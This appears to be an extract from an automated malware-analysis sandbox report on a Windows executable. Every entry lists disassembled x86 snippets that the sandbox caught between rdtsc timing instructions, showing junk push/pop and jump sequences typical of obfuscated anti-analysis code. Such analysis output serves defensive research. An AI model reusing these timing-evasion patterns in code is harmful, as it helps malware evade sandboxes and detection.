Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6B36 second address: 12E6B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6B3C second address: 12E6B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6C7A second address: 12E6C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6C80 second address: 12E6CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FEE1507F275h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6E2F second address: 12E6E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1472CB66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EB89B second address: 12EB8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EB8A0 second address: 12EB8B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FEE1472CB56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EB8B3 second address: 12EB8BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBAB5 second address: 12EBABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBABD second address: 12EBAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEE1507F266h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dl, 00000011h 0x00000012 push 00000004h 0x00000014 push eax 0x00000015 jmp 00007FEE1507F26Eh 0x0000001a pop edx 0x0000001b call 00007FEE1507F269h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBAF0 second address: 12EBAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBAF4 second address: 12EBAF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBAF8 second address: 12EBAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBAFE second address: 12EBB08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBB08 second address: 12EBB4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 jo 00007FEE1472CB6Dh 0x0000001d jmp 00007FEE1472CB67h 0x00000022 pop ebx 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBB4A second address: 12EBB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBB4F second address: 12EBB59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FEE1472CB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBD99 second address: 12EBD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBD9F second address: 12EBDA4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBDA4 second address: 12EBE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FEE1507F273h 0x0000000d nop 0x0000000e pushad 0x0000000f mov ebx, dword ptr [ebp+122D2C44h] 0x00000015 mov edx, dword ptr [ebp+122D29E2h] 0x0000001b popad 0x0000001c jnp 00007FEE1507F26Ch 0x00000022 mov dword ptr [ebp+122D38B3h], ecx 0x00000028 push dword ptr [ebp+122D1DEDh] 0x0000002e jmp 00007FEE1507F26Fh 0x00000033 push CFC3DA01h 0x00000038 pushad 0x00000039 jmp 00007FEE1507F278h 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ED247 second address: 12ED264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FEE1472CB60h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EF2D9 second address: 12EF2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EF2DE second address: 12EF2F4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE1472CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990DB1 second address: 4990DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990DB7 second address: 4990DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990DBB second address: 4990DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990DBF second address: 4990DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990DCE second address: 4990DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990DD2 second address: 4990DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C09E0 second address: 49C0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE1507F275h 0x00000009 sbb si, 5846h 0x0000000e jmp 00007FEE1507F271h 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FEE1507F278h 0x00000022 and ecx, 01F40018h 0x00000028 jmp 00007FEE1507F26Bh 0x0000002d popfd 0x0000002e mov cx, 0BCFh 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FEE1507F271h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0A5D second address: 49C0A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3EBE7342h 0x00000008 mov bh, 81h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEE1472CB61h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960131 second address: 4960187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEE1507F26Ah 0x0000000a xor eax, 3979F8A8h 0x00000010 jmp 00007FEE1507F26Bh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a mov dx, ax 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FEE1507F273h 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEE1507F275h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960187 second address: 496018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496018C second address: 496019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496019D second address: 49601A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49601A3 second address: 49601A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980C74 second address: 4980C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980C78 second address: 4980C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498048B second address: 4980491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980491 second address: 4980495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980495 second address: 49804F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FEE1472CB68h 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FEE1472CB67h 0x00000018 add esi, 2F0316AEh 0x0000001e jmp 00007FEE1472CB69h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49804F2 second address: 4980523 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE1507F270h 0x00000008 adc al, 00000028h 0x0000000b jmp 00007FEE1507F26Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ah, 81h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c mov dx, cx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980523 second address: 498055F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FEE1472CB5Bh 0x00000013 jmp 00007FEE1472CB68h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990180 second address: 4990184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990184 second address: 49901A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49901A1 second address: 49901BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49901BE second address: 49901C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49901C4 second address: 49901C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49901C8 second address: 49901E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE1472CB5Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49901E0 second address: 49901E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0907 second address: 49C090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C090D second address: 49C093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEE1507F26Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FEE1507F270h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C093D second address: 49C0943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0943 second address: 49C0952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1507F26Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0231 second address: 49A0237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0237 second address: 49A025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov si, 3DC1h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FEE1507F26Bh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A025E second address: 49A0292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FEE1472CB66h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0292 second address: 49A02AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980665 second address: 4980681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980681 second address: 4980694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980694 second address: 498069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498069A second address: 49806B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEE1507F26Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0052 second address: 49A0076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEE1472CB5Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0040 second address: 49C00A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D1D1h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FEE1507F26Ch 0x00000012 mov ebp, esp 0x00000014 jmp 00007FEE1507F270h 0x00000019 xchg eax, ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, 8570h 0x00000021 pushfd 0x00000022 jmp 00007FEE1507F279h 0x00000027 or si, 06F6h 0x0000002c jmp 00007FEE1507F271h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C00A5 second address: 49C019B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE1472CB67h 0x00000009 sbb ecx, 2F91FC2Eh 0x0000000f jmp 00007FEE1472CB69h 0x00000014 popfd 0x00000015 call 00007FEE1472CB60h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 mov al, CBh 0x00000023 pushfd 0x00000024 jmp 00007FEE1472CB69h 0x00000029 adc eax, 3E2485C6h 0x0000002f jmp 00007FEE1472CB61h 0x00000034 popfd 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007FEE1472CB60h 0x0000003c xor esi, 3E755E68h 0x00000042 jmp 00007FEE1472CB5Bh 0x00000047 popfd 0x00000048 popad 0x00000049 xchg eax, ecx 0x0000004a jmp 00007FEE1472CB66h 0x0000004f mov eax, dword ptr [76FB65FCh] 0x00000054 jmp 00007FEE1472CB60h 0x00000059 test eax, eax 0x0000005b pushad 0x0000005c movzx esi, di 0x0000005f popad 0x00000060 je 00007FEE86CA0339h 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FEE1472CB5Eh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C019B second address: 49C01AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C01AA second address: 49C0271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3EEB517Ah 0x00000008 pushfd 0x00000009 jmp 00007FEE1472CB5Bh 0x0000000e or ax, 3D1Eh 0x00000013 jmp 00007FEE1472CB69h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ecx, eax 0x0000001e jmp 00007FEE1472CB5Eh 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FEE1472CB67h 0x0000002d adc ah, FFFFFFDEh 0x00000030 jmp 00007FEE1472CB69h 0x00000035 popfd 0x00000036 jmp 00007FEE1472CB60h 0x0000003b popad 0x0000003c and ecx, 1Fh 0x0000003f pushad 0x00000040 push ecx 0x00000041 pushfd 0x00000042 jmp 00007FEE1472CB5Dh 0x00000047 xor ax, 90C6h 0x0000004c jmp 00007FEE1472CB61h 0x00000051 popfd 0x00000052 pop esi 0x00000053 mov ax, dx 0x00000056 popad 0x00000057 ror eax, cl 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0271 second address: 49C0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0275 second address: 49C0289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0289 second address: 49C028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0312 second address: 49C0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0316 second address: 49C0330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0330 second address: 49C0343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, 1Fh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 mov ch, dh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4970017 second address: 49700A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEE1507F26Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FEE1507F271h 0x00000017 or esi, 4CBA3546h 0x0000001d jmp 00007FEE1507F271h 0x00000022 popfd 0x00000023 pushad 0x00000024 mov bl, 48h 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov ch, 90h 0x0000002c mov edx, 46682F32h 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007FEE1507F279h 0x00000039 and esp, FFFFFFF8h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49700A2 second address: 49700A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49700A6 second address: 49700B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49700B9 second address: 49700E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, di 0x00000010 mov cx, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4970204 second address: 497020A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 497020A second address: 497020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
